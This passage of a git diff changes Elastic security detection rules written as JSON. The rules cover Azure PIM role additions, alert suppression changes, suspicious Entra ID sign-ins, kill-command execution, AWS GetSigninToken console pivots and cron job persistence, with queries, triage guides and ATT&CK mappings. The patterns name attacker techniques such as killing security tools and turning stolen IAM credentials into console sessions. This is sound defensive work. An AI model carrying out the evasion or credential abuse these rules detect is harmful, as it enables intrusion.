"ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ed3fedc3-dd10-45a5-a485-34a8b48cea46", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.004", - "name": "SSH", - "reference": "https://attack.mitre.org/techniques/T1021/004/" - } - ] - }, - { - "id": "T1570", - "name": "Lateral Tool Transfer", - "reference": "https://attack.mitre.org/techniques/T1570/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "ed3fedc3-dd10-45a5-a485-34a8b48cea46_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_103.json b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_103.json deleted file mode 100644 index 3b42729fab0..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_103.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization.", - "false_positives": [ - "Global administrator additions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Global administrator additions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Global Administrator Role Addition to PIM User", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Global Administrator Role Addition to PIM User\n\nAzure AD's Global Administrator role grants extensive access, allowing users to modify any administrative setting. Privileged Identity Management (PIM) helps manage and monitor such access. Adversaries may exploit this by adding themselves or others to this role, gaining persistent control. The detection rule identifies suspicious role additions by monitoring specific audit logs, focusing on successful role assignments to PIM users, thus helping to flag potential unauthorized access attempts.\n\n### Possible investigation steps\n\n- Review the Azure audit logs to confirm the details of the role addition event, focusing on the event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement fields.\n- Identify the user account that was added to the Global Administrator role by examining the azure.auditlogs.properties.target_resources.*.display_name field.\n- Check the event.outcome field to ensure the role addition was successful and not a failed attempt.\n- Investigate the user account's recent activities and login history to determine if there are any anomalies or signs of compromise.\n- Verify if the role addition aligns with any recent administrative changes or requests within the organization to rule out legitimate actions.\n- Assess the potential impact of the role addition by reviewing the permissions and access levels granted to the user.\n- If suspicious activity is confirmed, initiate a response plan to remove unauthorized access and secure the affected accounts.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role for maintenance or updates. To manage this, create exceptions for known IT personnel or scheduled maintenance windows.\n- Automated scripts or tools used for role assignments can cause false positives if they frequently add users to the Global Administrator role. Consider excluding these automated processes from monitoring or adjusting the detection rule to account for their activity.\n- Temporary project-based role assignments might be flagged as suspicious. Implement a process to document and pre-approve such assignments, allowing for their exclusion from alerts.\n- Training or onboarding sessions where new administrators are temporarily granted elevated access can result in false positives. Establish a protocol to notify the monitoring team of these events in advance, so they can be excluded from the detection rule.\n\n### Response and remediation\n\n- Immediately revoke the Global Administrator role from any unauthorized PIM user identified in the alert to prevent further unauthorized access.\n- Conduct a thorough review of recent changes made by the affected account to identify any unauthorized modifications or suspicious activities.\n- Reset the credentials of the compromised account and enforce multi-factor authentication (MFA) to secure the account against further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional monitoring on the affected account and related systems to detect any further suspicious activities.\n- Review and update access policies and role assignments in Azure AD to ensure that only necessary personnel have elevated privileges.\n- Document the incident and response actions taken for future reference and to improve incident response procedures.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and\n azure.auditlogs.operation_name:(\"Add eligible member to role in PIM completed (permanent)\" or\n \"Add member to role in PIM completed (timebound)\") and\n azure.auditlogs.properties.target_resources.*.display_name:\"Global Administrator\" and\n event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.category", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.display_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_103.json b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_103.json deleted file mode 100644 index f1917839042..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_103.json +++ /dev/null @@ -1,82 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility.", - "false_positives": [ - "Suppression Rules can be created legitimately by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Suppression Rules created by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Alert Suppression Rule Created or Modified", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Alert Suppression Rule Created or Modified\n\nAzure Alert Suppression Rules are used to manage alert noise by filtering out known false positives. However, adversaries can exploit these rules to hide malicious activities by suppressing legitimate security alerts. The detection rule monitors Azure activity logs for successful operations related to suppression rule changes, helping identify potential misuse that could lead to defense evasion and reduced security visibility.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific suppression rule that was created or modified by filtering logs with the operation name \"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\" and ensuring the event outcome is \"success\".\n- Determine the identity of the user or service principal that performed the operation by examining the associated user or service account details in the activity logs.\n- Investigate the context and justification for the creation or modification of the suppression rule by checking any related change management records or communications.\n- Assess the impact of the suppression rule on security visibility by identifying which alerts are being suppressed and evaluating whether these alerts are critical for detecting potential threats.\n- Cross-reference the suppression rule changes with recent security incidents or alerts to determine if there is any correlation or if the rule could have been used to hide malicious activity.\n- Verify the legitimacy of the suppression rule by consulting with relevant stakeholders, such as security operations or cloud management teams, to confirm if the change was authorized and aligns with security policies.\n\n### False positive analysis\n\n- Routine maintenance activities by IT staff may trigger alerts when legitimate suppression rules are created or modified. To manage this, establish a baseline of expected changes and create exceptions for known maintenance periods or personnel.\n- Automated processes or scripts that regularly update suppression rules for operational efficiency can generate false positives. Identify these processes and exclude their activity from alerting by using specific identifiers or tags associated with the automation.\n- Changes made by trusted third-party security services that integrate with Azure might be flagged. Verify the legitimacy of these services and whitelist their operations to prevent unnecessary alerts.\n- Frequent updates to suppression rules due to evolving security policies can lead to false positives. Document these policy changes and adjust the alerting criteria to accommodate expected modifications.\n- Temporary suppression rules created during incident response to manage alert noise can be mistaken for malicious activity. Ensure these rules are documented and time-bound, and exclude them from alerting during the response period.\n\n### Response and remediation\n\n- Immediately review the Azure activity logs to confirm the creation or modification of the suppression rule and identify the user or service account responsible for the change.\n- Temporarily disable the suspicious suppression rule to restore visibility into potential security alerts that may have been suppressed.\n- Conduct a thorough investigation of recent alerts that were suppressed by the rule to determine if any malicious activities were overlooked.\n- If malicious activity is confirmed, initiate incident response procedures to contain and remediate the threat, including isolating affected resources and accounts.\n- Escalate the incident to the security operations team for further analysis and to assess the potential impact on the organization's security posture.\n- Implement additional monitoring and alerting for changes to suppression rules to ensure any future modifications are promptly detected and reviewed.\n- Review and update access controls and permissions for creating or modifying suppression rules to ensure only authorized personnel can make such changes.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\" and\nevent.outcome: \"success\"\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://docs.microsoft.com/en-us/rest/api/securitycenter/alerts-suppression-rules/update" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f0bc081a-2346-4744-a6a4-81514817e888", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "f0bc081a-2346-4744-a6a4-81514817e888_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_3.json b/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_3.json index 274f04bbfbf..aead012d2d5 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f0cc239b-67fa-46fc-89d4-f861753a40f5_3.json @@ -13,6 +13,16 @@ "name": "Microsoft 365 or Entra ID Sign-in from a Suspicious Source", "note": "## Triage and analysis\n\n### Investigating Microsoft 365 or Entra ID Sign-in from a Suspicious Source\n\n#### Possible investigation steps\n\n- Investiguate all the alerts associated with the source.ip.\n - Verify the network security alert details associated with this source.ip.\n - Verify all sign-in events associated with this source.ip.\n - Consider the source IP address and geolocation for the involved user account.\n - Consider the device used to sign in. Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "from logs-o365.audit-*, logs-azure.signinlogs-*, .alerts-security.*\n// query runs every 1 hour looking for activities occurred during last 8 hours to match on disparate events\n| where @timestamp > now() - 8 hours\n// filter for azure or m365 sign-in and external alerts with source.ip not null\n| where to_ip(source.ip) is not null\n and (event.dataset in (\"o365.audit\", \"azure.signinlogs\") or kibana.alert.rule.name == \"External Alerts\")\n and not cidr_match(\n to_ip(source.ip),\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\", \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\",\n \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\"\n )\n\n// capture relevant raw fields\n| keep source.ip, event.action, event.outcome, event.dataset, kibana.alert.rule.name, event.category\n\n// classify each source ip based on alert type\n| eval\n Esql.source_ip_mail_access_case = case(event.dataset == \"o365.audit\" and event.action == \"MailItemsAccessed\" and event.outcome == \"success\", to_ip(source.ip), null),\n Esql.source_ip_azure_signin_case = case(event.dataset == \"azure.signinlogs\" and event.outcome == \"success\", to_ip(source.ip), null),\n Esql.source_ip_network_alert_case = case(kibana.alert.rule.name == \"external alerts\" and not event.dataset in (\"o365.audit\", \"azure.signinlogs\"), to_ip(source.ip), null)\n\n// aggregate by source ip\n| stats\n Esql.event_count = count(*),\n Esql.source_ip_mail_access_case_count_distinct = count_distinct(Esql.source_ip_mail_access_case),\n Esql.source_ip_azure_signin_case_count_distinct = count_distinct(Esql.source_ip_azure_signin_case),\n Esql.source_ip_network_alert_case_count_distinct = count_distinct(Esql.source_ip_network_alert_case),\n Esql.event_dataset_count_distinct = count_distinct(event.dataset),\n Esql.event_dataset_values = values(event.dataset),\n Esql.kibana_alert_rule_name_values = values(kibana.alert.rule.name),\n Esql.event_category_values = values(event.category)\n by Esql.source_ip = to_ip(source.ip)\n\n// correlation condition\n| where\n Esql.source_ip_network_alert_case_count_distinct > 0\n and Esql.event_dataset_count_distinct >= 2\n and (Esql.source_ip_mail_access_case_count_distinct > 0 or Esql.source_ip_azure_signin_case_count_distinct > 0)\n and Esql.event_count <= 100\n", + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 73, "rule_id": "f0cc239b-67fa-46fc-89d4-f861753a40f5", "setup": "The Azure Fleet integration, Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/f391d3fd-219b-42a3-9ba9-2f66eb0155aa_1.json b/packages/security_detection_engine/kibana/security_rule/f391d3fd-219b-42a3-9ba9-2f66eb0155aa_1.json deleted file mode 100644 index b2c850d6b98..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f391d3fd-219b-42a3-9ba9-2f66eb0155aa_1.json +++ /dev/null @@ -1,128 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations.", - "from": "now-9m", - "history_window_start": "now-7d", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kill Command Execution", - "new_terms_fields": [ - "host.id", - "process.parent.executable" - ], - "query": "event.category:process and host.os.type:linux and event.type:start and event.action:exec and\nprocess.name:(kill or pkill or killall)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f391d3fd-219b-42a3-9ba9-2f66eb0155aa", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1564", - "name": "Hide Artifacts", - "reference": "https://attack.mitre.org/techniques/T1564/", - "subtechnique": [ - { - "id": "T1564.001", - "name": "Hidden Files and Directories", - "reference": "https://attack.mitre.org/techniques/T1564/001/" - } - ] - }, - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.006", - "name": "Indicator Blocking", - "reference": "https://attack.mitre.org/techniques/T1562/006/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.004", - "name": "Unix Shell", - "reference": "https://attack.mitre.org/techniques/T1059/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "f391d3fd-219b-42a3-9ba9-2f66eb0155aa_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f754e348-f36f-4510-8087-d7f29874cc12_1.json b/packages/security_detection_engine/kibana/security_rule/f754e348-f36f-4510-8087-d7f29874cc12_1.json new file mode 100644 index 00000000000..657c3464f64 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f754e348-f36f-4510-8087-d7f29874cc12_1.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Captures requests to the AWS federation endpoint (signin.amazonaws.com) for GetSigninToken. This API exchanges existing temporary AWS credentials (e.g., from STS GetFederationToken or AssumeRole) for a short-lived sign-in token that is embedded in a one-click URL to the AWS Management Console. It is commonly used by custom federation tools and automation to pivot from programmatic access to a browser session. This is a building block rule meant to be used for correlation with other rules to detect suspicious activity.", + "false_positives": [ + "Legitimate federation workflows, admin portals, SSO helpers, CI/CD jobs, or internal scripts that create one-click console links, commonly invoke GetSigninToken and may generate frequent benign events." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.session_context.session_issuer.arn", + "aws.cloudtrail.user_identity.session_context.session_issuer.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Sign-In Token Created", + "query": "event.dataset: \"aws.cloudtrail\" and \n event.provider: \"signin.amazonaws.com\" and \n event.action : \"GetSigninToken\" and \n event.outcome: \"success\"\n", + "references": [ + "https://hackingthe.cloud/aws/post_exploitation/create_a_console_session_from_iam_credentials/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f754e348-f36f-4510-8087-d7f29874cc12", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "f754e348-f36f-4510-8087-d7f29874cc12_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_15.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_15.json deleted file mode 100644 index fcd79377a62..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_15.json +++ /dev/null @@ -1,156 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.file*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Cron Job Created or Modified", - "note": "## Triage and analysis\n\n### Investigating Cron Job Created or Modified\nLinux cron jobs are scheduled tasks that run at specified intervals or times, managed by the cron daemon. \n\nBy creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors the creation of cron jobs by monitoring for file creation and rename events in the most common cron job task location directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the cron job file that was created or modified.\n- Investigate whether any other files in any of the available cron job directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/cron.allow.d/%' OR path LIKE '/etc/cron.d/%' OR path LIKE '/etc/cron.hourly/%'\\nOR path LIKE '/etc/cron.daily/%' OR path LIKE '/etc/cron.weekly/%' OR path LIKE '/etc/cron.monthly/%' OR path LIKE\\n'/var/spool/cron/crontabs/%')\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Cron File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/etc/cron.allow' OR path = '/etc/cron.deny' OR path = '/etc/crontab')\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT f.path, u.username AS file_owner, g.groupname AS group_owner, datetime(f.atime, 'unixepoch') AS\\nfile_last_access_time, datetime(f.mtime, 'unixepoch') AS file_last_modified_time, datetime(f.ctime, 'unixepoch') AS\\nfile_last_status_change_time, datetime(f.btime, 'unixepoch') AS file_created_time, f.size AS size_bytes FROM file f LEFT\\nJOIN users u ON f.uid = u.uid LEFT JOIN groups g ON f.gid = g.gid WHERE ( path LIKE '/etc/cron.allow.d/%' OR path LIKE\\n'/etc/cron.d/%' 